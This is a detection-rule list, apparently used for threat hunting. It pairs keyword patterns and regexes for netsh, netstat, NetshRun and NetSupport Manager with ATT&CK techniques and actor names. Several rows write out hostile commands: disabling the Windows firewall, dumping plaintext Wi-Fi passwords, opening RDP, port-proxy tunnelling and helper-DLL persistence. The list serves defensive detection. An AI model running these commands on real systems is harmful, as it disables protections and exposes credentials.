"*netscan_setup.exe*",".{0,1000}netscan_setup\.exe.{0,1000}","greyware_tool_keyword","netscan","SoftPerfect Network Scanner abused by threat actor","T1040 - T1046 - T1018","TA0007 - TA0010 - TA0001","N/A","N/A","Discovery","https://www.softperfect.com/products/networkscanner/","1","0","N/A","network exploitation tool","6","10","N/A","N/A","N/A","N/A" "*netsh advfirewall firewall show rule 
name=all*",".{0,1000}netsh\sadvfirewall\sfirewall\sshow\srule\sname\=all.{0,1000}","greyware_tool_keyword","netsh","gathering information about network configurations","T1016 - T1089","TA0007 - TA0009","N/A","Volt Typhoon - Naikon - APT32 - Magic Hound - Lazarus Group - Carbanak - Dragonfly","Discovery","N/A","1","0","N/A","N/A","6","8","N/A","N/A","N/A","N/A" "*netsh advfirewall set allprofiles state off*",".{0,1000}netsh\sadvfirewall\sset\sallprofiles\sstate\soff.{0,1000}","greyware_tool_keyword","netsh","script to dismantle complete windows defender protection and even bypass tamper protection - Disable Windows-Defender Permanently.","T1562.001","TA0005","N/A","Volt Typhoon - Naikon - APT32 - Magic Hound - Lazarus Group - Carbanak - Dragonfly","Defense Evasion","https://github.com/swagkarna/Defeat-Defender-V1.2.0","1","0","N/A","N/A","10","10","1435","303","2023-10-20T17:55:09Z","2020-12-10T07:22:06Z" "*NetSh Advfirewall set allprofiles state off*",".{0,1000}NetSh\sAdvfirewall\sset\sallprofiles\sstate\soff.{0,1000}","greyware_tool_keyword","netsh","Disable Windows Firewall","T1562.004 - T1055.001","TA0005","N/A","Volt Typhoon - Naikon - APT32 - Magic Hound - Lazarus Group - Carbanak - Dragonfly","Defense Evasion","N/A","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*netsh firewall add allowedprogram ""C:\Users\*\AppData\*.exe"" ""*.exe"" ENABLE*",".{0,1000}netsh\sfirewall\sadd\sallowedprogram\s\""C\:\\Users\\.{0,1000}\\AppData\\.{0,1000}\.exe\""\s\"".{0,1000}\.exe\""\sENABLE.{0,1000}","greyware_tool_keyword","netsh","adding an executable in user appdata folder to the allowed programs","T1562.004","TA0005 ","N/A","Volt Typhoon - Naikon - APT32 - Magic Hound - Lazarus Group - Carbanak - Dragonfly","Defense Evasion","https://tria.ge/231006-ydmxjsfe5s/behavioral1/analog?proc=66","1","0","N/A","N/A","3","8","N/A","N/A","N/A","N/A" "*netsh firewall delete allowedprogram 
*",".{0,1000}netsh\sfirewall\sdelete\sallowedprogram\s.{0,1000}","greyware_tool_keyword","netsh","delete an item from firewall allowedprogram Whitelist","T1562 - T1489 - T1070","TA0005 - TA0040","N/A","Volt Typhoon - Naikon - APT32 - Magic Hound - Lazarus Group - Carbanak - Dragonfly","Defense Evasion","N/A","1","0","N/A","N/A","8","8","N/A","N/A","N/A","N/A" "*netsh firewall set opmode disable*",".{0,1000}netsh\sfirewall\sset\sopmode\sdisable.{0,1000}","greyware_tool_keyword","netsh","Disable Windows Firewall","T1562.004 - T1059.005","TA0005 - TA0040","N/A","Volt Typhoon - Naikon - APT32 - Magic Hound - Lazarus Group - Carbanak - Dragonfly","Defense Evasion","N/A","1","0","N/A","N/A","6","10","N/A","N/A","N/A","N/A" "*netsh firewall show config*",".{0,1000}netsh\sfirewall\sshow\sconfig.{0,1000}","greyware_tool_keyword","netsh","show all firewall rules config","T1016 - T1049","TA0007 - TA0009","N/A","Volt Typhoon - Naikon - APT32 - Magic Hound - Lazarus Group - Carbanak - Dragonfly","Discovery","N/A","1","0","N/A","https://github.com/alperenugurlu/AD_Enumeration_Hunt/blob/alperen_ugurlu_hack/AD_Enumeration_Hunt.ps1","6","8","N/A","N/A","N/A","N/A" "*netsh interface portproxy add v4tov4 listenport=* connectaddress=*",".{0,1000}netsh\sinterface\sportproxy\sadd\sv4tov4\slistenport\=.{0,1000}\sconnectport\=.{0,1000}\sconnectaddress\=.{0,1000}","greyware_tool_keyword","netsh","commands from wmiexec2.0 - is the same wmiexec that everyone knows and loves (debatable). 
This 2.0 version is obfuscated to avoid well known signatures from various AV engines.","T1047 - T1027 - T1059","TA0005 - TA0002","N/A","Volt Typhoon - Naikon - APT32 - Magic Hound - Lazarus Group - Carbanak - Dragonfly","Defense Evasion","https://github.com/ice-wzl/wmiexec2","1","0","N/A","N/A","9","1","27","1","2024-06-12T17:56:15Z","2023-02-07T22:10:08Z" "*netsh interface portproxy add v4tov4*listenaddress=* listenport=*connectaddress=*connectport*",".{0,1000}netsh\sinterface\sportproxy\sadd\sv4tov4.{0,1000}listenaddress\=.{0,1000}\slistenport\=.{0,1000}connectaddress\=.{0,1000}connectport.{0,1000}","greyware_tool_keyword","netsh","The actor has used the following commands to enable port forwarding [T1090] on the host","T1090.003 - T1123","TA0005 - TA0002","N/A","Volt Typhoon - Naikon - APT32 - Magic Hound - Lazarus Group - Carbanak - Dragonfly","Credential Access","https://media.defense.gov/2023/May/24/2003229517/-1/-1/0/CSA_Living_off_the_Land.PDF","1","0","N/A","N/A","9","10","N/A","N/A","N/A","N/A" "*netsh interface portproxy delete v4tov4 listenaddress=0.0.0.0 listenport=*",".{0,1000}netsh\sinterface\sportproxy\sdelete\sv4tov4\slistenaddress\=0\.0\.0\.0\slistenport\=.{0,1000}","greyware_tool_keyword","netsh","attempt to remove port proxy configurations","T1562.004","TA0005 ","N/A","Volt Typhoon - Naikon - APT32 - Magic Hound - Lazarus Group - Carbanak - Dragonfly","Defense Evasion","https://media.defense.gov/2024/Feb/07/2003389936/-1/-1/0/JOINT-GUIDANCE-IDENTIFYING-AND-MITIGATING-LOTL.PDF","1","0","N/A","N/A","9","10","N/A","N/A","N/A","N/A" "*netsh interface portproxy delete v4tov4 listenport=*",".{0,1000}netsh\sinterface\sportproxy\sdelete\sv4tov4\slistenport\=.{0,1000}","greyware_tool_keyword","netsh","commands from wmiexec2.0 - is the same wmiexec that everyone knows and loves (debatable). 
This 2.0 version is obfuscated to avoid well known signatures from various AV engines.","T1047 - T1027 - T1059","TA0005 - TA0002","N/A","Volt Typhoon - Naikon - APT32 - Magic Hound - Lazarus Group - Carbanak - Dragonfly","Defense Evasion","https://github.com/ice-wzl/wmiexec2","1","0","N/A","N/A","9","1","27","1","2024-06-12T17:56:15Z","2023-02-07T22:10:08Z" "*netsh interface portproxy show all*",".{0,1000}netsh\sinterface\sportproxy\sshow\sall.{0,1000}","greyware_tool_keyword","netsh","display all current TCP port redirections configured on the system","T1059.007","TA0002 - TA0007","N/A","Volt Typhoon - Naikon - APT32 - Magic Hound - Lazarus Group - Carbanak - Dragonfly","Discovery","N/A","1","0","N/A","greyware tool - risks of False positive !","6","8","N/A","N/A","N/A","N/A" "*netsh interface portproxy show v4tov4*",".{0,1000}netsh\sinterface\sportproxy\sshow\sv4tov4.{0,1000}","greyware_tool_keyword","netsh","commands from wmiexec2.0 - is the same wmiexec that everyone knows and loves (debatable). 
This 2.0 version is obfuscated to avoid well known signatures from various AV engines.","T1047 - T1027 - T1059","TA0005 - TA0002","N/A","Volt Typhoon - Naikon - APT32 - Magic Hound - Lazarus Group - Carbanak - Dragonfly","Defense Evasion","https://github.com/ice-wzl/wmiexec2","1","0","N/A","N/A","9","1","27","1","2024-06-12T17:56:15Z","2023-02-07T22:10:08Z" "*netsh wlan show profiles key=clear*",".{0,1000}netsh\swlan\sshow\sprofiles\skey\=clear.{0,1000}","greyware_tool_keyword","netsh","display saved Wi-Fi profiles including plaintext passwords on a Windows system","T1003 - T1552.001","TA0006 - TA0009","N/A","Volt Typhoon - Naikon - APT32 - Magic Hound - Lazarus Group - Carbanak - Dragonfly","Credential Access","N/A","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*netsh.exe advfirewall firewall add rule ""name=allow RemoteDesktop"" dir=in * localport=* action=allow*",".{0,1000}netsh\.exe\sadvfirewall\sfirewall\sadd\srule\s\""name\=allow\sRemoteDesktop\""\sdir\=in\s.{0,1000}\slocalport\=.{0,1000}\saction\=allow.{0,1000}","greyware_tool_keyword","netsh","Adds a new rule to the Windows firewall that allows incoming RDP traffic.","T1562.004 - T1021.001","TA0005 - TA0008","N/A","Volt Typhoon - Naikon - APT32 - Magic Hound - Lazarus Group - Carbanak - Dragonfly","Lateral Movement","https://www.cisa.gov/sites/default/files/2023-05/aa23-136a_stopransomware_bianlian_ransomware_group_1.pdf","1","0","N/A","N/A","9","10","N/A","N/A","N/A","N/A" "*netsh.exe advfirewall firewall set rule ""group=remote desktop"" new enable=Yes*",".{0,1000}netsh\.exe\sadvfirewall\sfirewall\sset\srule\s\""group\=remote\sdesktop\""\snew\senable\=Yes.{0,1000}","greyware_tool_keyword","netsh","Enables the pre-existing Windows firewall rule group named Remote Desktop. 
This rule group allows incoming RDP traffic.","T1562.004 - T1078 - T1021.001","TA0005 - TA0008","N/A","Volt Typhoon - Naikon - APT32 - Magic Hound - Lazarus Group - Carbanak - Dragonfly","Lateral Movement","https://www.cisa.gov/sites/default/files/2023-05/aa23-136a_stopransomware_bianlian_ransomware_group_1.pdf","1","0","N/A","N/A","9","10","N/A","N/A","N/A","N/A" "*netsh.exe trace start maxSize=1 fileMode=single capture=yes traceFile=*\TEMP*.etl*",".{0,1000}netsh\.exe\strace\sstart\smaxSize\=1\sfileMode\=single\scapture\=yes\straceFile\=.{0,1000}\\TEMP.{0,1000}\.etl.{0,1000}","greyware_tool_keyword","netsh","capturing a network trace with netsh","T1049 - T1119","TA0007 - TA0009","N/A","Volt Typhoon - Naikon - APT32 - Magic Hound - Lazarus Group - Carbanak - Dragonfly","Discovery","N/A","1","0","N/A","N/A","6","8","N/A","N/A","N/A","N/A" "*netsh.exe wlan show profiles key=clear*",".{0,1000}netsh\.exe\swlan\sshow\sprofiles\skey\=clear.{0,1000}","greyware_tool_keyword","netsh","display saved Wi-Fi profiles including plaintext passwords on a Windows system","T1003 - T1552.001","TA0006 - TA0009","N/A","Volt Typhoon - Naikon - APT32 - Magic Hound - Lazarus Group - Carbanak - Dragonfly","Credential Access","N/A","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*netsh.exe* interface portproxy show all*",".{0,1000}netsh\.exe.{0,1000}\sinterface\sportproxy\sshow\sall.{0,1000}","greyware_tool_keyword","netsh","display all current TCP port redirections configured on the system","T1059.007","TA0002 - TA0007","N/A","Volt Typhoon - Naikon - APT32 - Magic Hound - Lazarus Group - Carbanak - Dragonfly","Discovery","N/A","1","0","N/A","greyware tool - risks of False positive !","6","8","N/A","N/A","N/A","N/A" "*/netshrun.c*",".{0,1000}\/netshrun\.c.{0,1000}","greyware_tool_keyword","NetshRun","Netsh.exe relies on extensions taken from Registry which means it may be used as a persistence and you go one step further extending netsh with a DLL allowing you to do whatever you 
want","T1546.008 - T1112 - T1037 - T1055 - T1218.001","TA0003 - TA0002 - TA0008","N/A","N/A","Exploitation tool","https://github.com/gtworek/PSBits/blob/master/NetShRun","1","1","N/A","N/A","N/A","10","3138","516","2024-08-03T11:45:25Z","2019-06-29T13:22:36Z" "*netsh.exe add helper *\temp\*.dll*",".{0,1000}netsh\.exe\sadd\shelper\s.{0,1000}\\temp\\.{0,1000}\.dll.{0,1000}","greyware_tool_keyword","NetshRun","Netsh.exe relies on extensions taken from Registry which means it may be used as a persistence and you go one step further extending netsh with a DLL allowing you to do whatever you want","T1546.008 - T1112 - T1037 - T1055 - T1218.001","TA0003 - TA0002 - TA0008","N/A","N/A","Exploitation tool","https://github.com/gtworek/PSBits/blob/master/NetShRun","1","0","N/A","N/A","N/A","10","3138","516","2024-08-03T11:45:25Z","2019-06-29T13:22:36Z" "*netshrun.dll*",".{0,1000}netshrun\.dll.{0,1000}","greyware_tool_keyword","NetshRun","Netsh.exe relies on extensions taken from Registry which means it may be used as a persistence and you go one step further extending netsh with a DLL allowing you to do whatever you want","T1546.008 - T1112 - T1037 - T1055 - T1218.001","TA0003 - TA0002 - TA0008","N/A","N/A","Exploitation tool","https://github.com/gtworek/PSBits/blob/master/NetShRun","1","1","N/A","N/A","N/A","10","3138","516","2024-08-03T11:45:25Z","2019-06-29T13:22:36Z" "*PSBits*NetShRun*",".{0,1000}PSBits.{0,1000}NetShRun.{0,1000}","greyware_tool_keyword","NetshRun","Netsh.exe relies on extensions taken from Registry which means it may be used as a persistence and you go one step further extending netsh with a DLL allowing you to do whatever you want","T1546.008 - T1112 - T1037 - T1055 - T1218.001","TA0003 - TA0002 - TA0008","N/A","N/A","Exploitation tool","https://github.com/gtworek/PSBits/blob/master/NetShRun","1","1","N/A","N/A","N/A","10","3138","516","2024-08-03T11:45:25Z","2019-06-29T13:22:36Z" "*netsat 
-naop*",".{0,1000}netsat\s\-naop.{0,1000}","greyware_tool_keyword","netstat","Adversaries may attempt to execute recon commands","T1049","TA0007","N/A","HEXANE - Ke3chang - Turla - Orangeworm - APT41 - OilRig - Threat Group-3390 - ToddyCat - admin@338 - Volt Typhoon - APT5","Discovery","N/A","1","0","N/A","greyware tool - risks of False positive !","5","8","N/A","N/A","N/A","N/A" "*netstat -ano*",".{0,1000}netstat\s\-ano.{0,1000}","greyware_tool_keyword","netstat","Adversaries may attempt to execute recon commands","T1049","TA0007","N/A","HEXANE - Ke3chang - Turla - Orangeworm - APT41 - OilRig - Threat Group-3390 - ToddyCat - admin@338 - Volt Typhoon - APT5","Discovery","N/A","1","0","N/A","greyware tool - risks of False positive !","5","8","N/A","N/A","N/A","N/A" "*netstat -ant*",".{0,1000}netstat\s\-ant.{0,1000}","greyware_tool_keyword","netstat","View all active TCP connections and the TCP and UDP ports the host is listening on.","T1049","TA0007","N/A","HEXANE - Ke3chang - Turla - Orangeworm - APT41 - OilRig - Threat Group-3390 - ToddyCat - admin@338 - Volt Typhoon - APT5","Discovery","N/A","1","0","N/A","greyware tool - risks of False positive !","5","8","N/A","N/A","N/A","N/A" "*NETSTAT.EXE* -ano*",".{0,1000}NETSTAT\.EXE.{0,1000}\s\-ano.{0,1000}","greyware_tool_keyword","netstat","Adversaries may attempt to execute recon commands","T1049","TA0007","N/A","HEXANE - Ke3chang - Turla - Orangeworm - APT41 - OilRig - Threat Group-3390 - ToddyCat - admin@338 - Volt Typhoon - APT5","Discovery","N/A","1","0","N/A","greyware tool - risks of False positive !","5","8","N/A","N/A","N/A","N/A" "* /EV""NetSupport School""*",".{0,1000}\s\/EV\""NetSupport\sSchool\"".{0,1000}","greyware_tool_keyword","NetSupport","NetSupport Manager is a remote access tool that can be used legitimately for IT management but has also been abused by adversaries for remote system control and surveillance","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Cuba - EvilCorp* - Black 
Basta","RMM","https://www.netsupportmanager.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*/nspowershell.exe*",".{0,1000}\/nspowershell\.exe.{0,1000}","greyware_tool_keyword","NetSupport","NetSupport Manager is a remote access tool that can be used legitimately for IT management but has also been abused by adversaries for remote system control and surveillance","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Cuba - EvilCorp* - Black Basta","RMM","https://www.netsupportmanager.com/","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*/nssadmui.exe*",".{0,1000}\/nssadmui\.exe.{0,1000}","greyware_tool_keyword","NetSupport","NetSupport Manager is a remote access tool that can be used legitimately for IT management but has also been abused by adversaries for remote system control and surveillance","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Cuba - EvilCorp* - Black Basta","RMM","https://www.netsupportmanager.com/","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*/pcictlui.exe*",".{0,1000}\/pcictlui\.exe.{0,1000}","greyware_tool_keyword","NetSupport","NetSupport Manager is a remote access tool that can be used legitimately for IT management but has also been abused by adversaries for remote system control and surveillance","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Cuba - EvilCorp* - Black Basta","RMM","https://www.netsupportmanager.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*/PCIDEPLY.exe*",".{0,1000}\/PCIDEPLY\.exe.{0,1000}","greyware_tool_keyword","NetSupport","NetSupport Manager is a remote access tool that can be used legitimately for IT management but has also been abused by adversaries for remote system control and surveillance","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Cuba - EvilCorp* - Black Basta","RMM","https://www.netsupportmanager.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" 
"*/Win7Taskbar.dll*",".{0,1000}\/Win7Taskbar\.dll.{0,1000}","greyware_tool_keyword","NetSupport","NetSupport Manager is a remote access tool that can be used legitimately for IT management but has also been abused by adversaries for remote system control and surveillance","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Cuba - EvilCorp* - Black Basta","RMM","https://www.netsupportmanager.com/","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*\ADM Templates\ADMX\*.admx*",".{0,1000}\\ADM\sTemplates\\ADMX\\.{0,1000}\.admx.{0,1000}","greyware_tool_keyword","NetSupport","NetSupport Manager is a remote access tool that can be used legitimately for IT management but has also been abused by adversaries for remote system control and surveillance","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Cuba - EvilCorp* - Black Basta","RMM","https://www.netsupportmanager.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*\AppData\Local\Temp\*\NSM.LIC*",".{0,1000}\\AppData\\Local\\Temp\\.{0,1000}\\NSM\.LIC.{0,1000}","greyware_tool_keyword","NetSupport","NetSupport Manager is a remote access tool that can be used legitimately for IT management but has also been abused by adversaries for remote system control and surveillance","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Cuba - EvilCorp* - Black Basta","RMM","https://www.netsupportmanager.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*\AppData\Roaming\*\remote.nsm*",".{0,1000}\\AppData\\Roaming\\.{0,1000}\\remote\.nsm.{0,1000}","greyware_tool_keyword","NetSupport","NetSupport Manager is a remote access tool that can be used legitimately for IT management but has also been abused by adversaries for remote system control and surveillance","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Cuba - EvilCorp* - Black Basta","RMM","https://www.netsupportmanager.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" 
"*\AppData\Roaming\NetSupport\*",".{0,1000}\\AppData\\Roaming\\NetSupport\\.{0,1000}","greyware_tool_keyword","NetSupport","NetSupport Manager is a remote access tool that can be used legitimately for IT management but has also been abused by adversaries for remote system control and surveillance","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Cuba - EvilCorp* - Black Basta","RMM","https://www.netsupportmanager.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*\NETSUP~1\PCIShellExt64.dll*",".{0,1000}\\NETSUP\~1\\PCIShellExt64\.dll.{0,1000}","greyware_tool_keyword","NetSupport","NetSupport Manager is a remote access tool that can be used legitimately for IT management but has also been abused by adversaries for remote system control and surveillance","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Cuba - EvilCorp* - Black Basta","RMM","https://www.netsupportmanager.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*\NetSupport Ltd\Client32*",".{0,1000}\\NetSupport\sLtd\\Client32.{0,1000}","greyware_tool_keyword","NetSupport","NetSupport Manager is a remote access tool that can be used legitimately for IT management but has also been abused by adversaries for remote system control and surveillance","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Cuba - EvilCorp* - Black Basta","RMM","https://www.netsupportmanager.com/","1","0","N/A","registry","10","10","N/A","N/A","N/A","N/A" "*\NetSupport Ltd\PCICTL*",".{0,1000}\\NetSupport\sLtd\\PCICTL.{0,1000}","greyware_tool_keyword","NetSupport","NetSupport Manager is a remote access tool that can be used legitimately for IT management but has also been abused by adversaries for remote system control and surveillance","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Cuba - EvilCorp* - Black Basta","RMM","https://www.netsupportmanager.com/","1","0","N/A","registry","10","10","N/A","N/A","N/A","N/A" "*\netsupport 
manager\*",".{0,1000}\\netsupport\smanager\\.{0,1000}","greyware_tool_keyword","NetSupport","NetSupport Manager is a remote access tool that can be used legitimately for IT management but has also been abused by adversaries for remote system control and surveillance","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Cuba - EvilCorp* - Black Basta","RMM","https://www.netsupportmanager.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*\NetSupport School Console*",".{0,1000}\\NetSupport\sSchool\sConsole.{0,1000}","greyware_tool_keyword","NetSupport","NetSupport Manager is a remote access tool that can be used legitimately for IT management but has also been abused by adversaries for remote system control and surveillance","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Cuba - EvilCorp* - Black Basta","RMM","https://www.netsupportmanager.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*\NetSupport School\*",".{0,1000}\\NetSupport\sSchool\\.{0,1000}","greyware_tool_keyword","NetSupport","NetSupport Manager is a remote access tool that can be used legitimately for IT management but has also been abused by adversaries for remote system control and surveillance","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Cuba - EvilCorp* - Black Basta","RMM","https://www.netsupportmanager.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*\NetSupport School\NetSupport*",".{0,1000}\\NetSupport\sSchool\\NetSupport.{0,1000}","greyware_tool_keyword","NetSupport","NetSupport Manager is a remote access tool that can be used legitimately for IT management but has also been abused by adversaries for remote system control and surveillance","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Cuba - EvilCorp* - Black Basta","RMM","https://www.netsupportmanager.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" 
"*\nspowershell.exe*",".{0,1000}\\nspowershell\.exe.{0,1000}","greyware_tool_keyword","NetSupport","NetSupport Manager is a remote access tool that can be used legitimately for IT management but has also been abused by adversaries for remote system control and surveillance","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Cuba - EvilCorp* - Black Basta","RMM","https://www.netsupportmanager.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*\nssadmui.exe*",".{0,1000}\\nssadmui\.exe.{0,1000}","greyware_tool_keyword","NetSupport","NetSupport Manager is a remote access tool that can be used legitimately for IT management but has also been abused by adversaries for remote system control and surveillance","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Cuba - EvilCorp* - Black Basta","RMM","https://www.netsupportmanager.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*\pcicfgui_client.exe*",".{0,1000}\\pcicfgui_client\.exe.{0,1000}","greyware_tool_keyword","NetSupport","NetSupport Manager is a remote access tool that can be used legitimately for IT management but has also been abused by adversaries for remote system control and surveillance","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Cuba - EvilCorp* - Black Basta","RMM","https://www.netsupportmanager.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*\pciconn.exe*",".{0,1000}\\pciconn\.exe.{0,1000}","greyware_tool_keyword","NetSupport","NetSupport Manager is a remote access tool that can be used legitimately for IT management but has also been abused by adversaries for remote system control and surveillance","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Cuba - EvilCorp* - Black Basta","RMM","https://www.netsupportmanager.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*\PCICTL\ConfigList\Standard\UI\*",".{0,1000}\\PCICTL\\ConfigList\\Standard\\UI\\.{0,1000}","greyware_tool_keyword","NetSupport","NetSupport Manager is a remote 
access tool that can be used legitimately for IT management but has also been abused by adversaries for remote system control and surveillance","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Cuba - EvilCorp* - Black Basta","RMM","https://www.netsupportmanager.com/","1","0","N/A","registry","10","10","N/A","N/A","N/A","N/A" "*\pcictlui.exe*",".{0,1000}\\pcictlui\.exe.{0,1000}","greyware_tool_keyword","NetSupport","NetSupport Manager is a remote access tool that can be used legitimately for IT management but has also been abused by adversaries for remote system control and surveillance","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Cuba - EvilCorp* - Black Basta","RMM","https://www.netsupportmanager.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*\PCIDEPLY.exe*",".{0,1000}\\PCIDEPLY\.exe.{0,1000}","greyware_tool_keyword","NetSupport","NetSupport Manager is a remote access tool that can be used legitimately for IT management but has also been abused by adversaries for remote system control and surveillance","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Cuba - EvilCorp* - Black Basta","RMM","https://www.netsupportmanager.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*\PCINSSCD.exe*",".{0,1000}\\PCINSSCD\.exe.{0,1000}","greyware_tool_keyword","NetSupport","NetSupport Manager is a remote access tool that can be used legitimately for IT management but has also been abused by adversaries for remote system control and surveillance","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Cuba - EvilCorp* - Black Basta","RMM","https://www.netsupportmanager.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*\PCINSSUI.exe*",".{0,1000}\\PCINSSUI\.exe.{0,1000}","greyware_tool_keyword","NetSupport","NetSupport Manager is a remote access tool that can be used legitimately for IT management but has also been abused by adversaries for remote system control and surveillance","T1021 - T1071 - T1090","TA0003 - 
TA0008 - TA0011","N/A","Cuba - EvilCorp* - Black Basta","RMM","https://www.netsupportmanager.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*\PCISCRUI.exe*",".{0,1000}\\PCISCRUI\.exe.{0,1000}","greyware_tool_keyword","NetSupport","NetSupport Manager is a remote access tool that can be used legitimately for IT management but has also been abused by adversaries for remote system control and surveillance","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Cuba - EvilCorp* - Black Basta","RMM","https://www.netsupportmanager.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*\PCIShellExt64.dll*",".{0,1000}\\PCIShellExt64\.dll.{0,1000}","greyware_tool_keyword","NetSupport","NetSupport Manager is a remote access tool that can be used legitimately for IT management but has also been abused by adversaries for remote system control and surveillance","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Cuba - EvilCorp* - Black Basta","RMM","https://www.netsupportmanager.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*\Scripts\CreateRegKey.scp*",".{0,1000}\\Scripts\\CreateRegKey\.scp.{0,1000}","greyware_tool_keyword","NetSupport","NetSupport Manager is a remote access tool that can be used legitimately for IT management but has also been abused by adversaries for remote system control and surveillance","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Cuba - EvilCorp* - Black Basta","RMM","https://www.netsupportmanager.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*\Scripts\DirLst.log*",".{0,1000}\\Scripts\\DirLst\.log.{0,1000}","greyware_tool_keyword","NetSupport","NetSupport Manager is a remote access tool that can be used legitimately for IT management but has also been abused by adversaries for remote system control and surveillance","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Cuba - EvilCorp* - Black 
Basta","RMM","https://www.netsupportmanager.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*\Scripts\DirLst.scp*",".{0,1000}\\Scripts\\DirLst\.scp.{0,1000}","greyware_tool_keyword","NetSupport","NetSupport Manager is a remote access tool that can be used legitimately for IT management but has also been abused by adversaries for remote system control and surveillance","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Cuba - EvilCorp* - Black Basta","RMM","https://www.netsupportmanager.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*\Scripts\DrvSize.scp*",".{0,1000}\\Scripts\\DrvSize\.scp.{0,1000}","greyware_tool_keyword","NetSupport","NetSupport Manager is a remote access tool that can be used legitimately for IT management but has also been abused by adversaries for remote system control and surveillance","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Cuba - EvilCorp* - Black Basta","RMM","https://www.netsupportmanager.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*\Scripts\writetofile.scp*",".{0,1000}\\Scripts\\writetofile\.scp.{0,1000}","greyware_tool_keyword","NetSupport","NetSupport Manager is a remote access tool that can be used legitimately for IT management but has also been abused by adversaries for remote system control and surveillance","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Cuba - EvilCorp* - Black Basta","RMM","https://www.netsupportmanager.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*\Software\NetSupport Ltd\*",".{0,1000}\\Software\\NetSupport\sLtd\\.{0,1000}","greyware_tool_keyword","NetSupport","NetSupport Manager is a remote access tool that can be used legitimately for IT management but has also been abused by adversaries for remote system control and surveillance","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Cuba - EvilCorp* - Black 
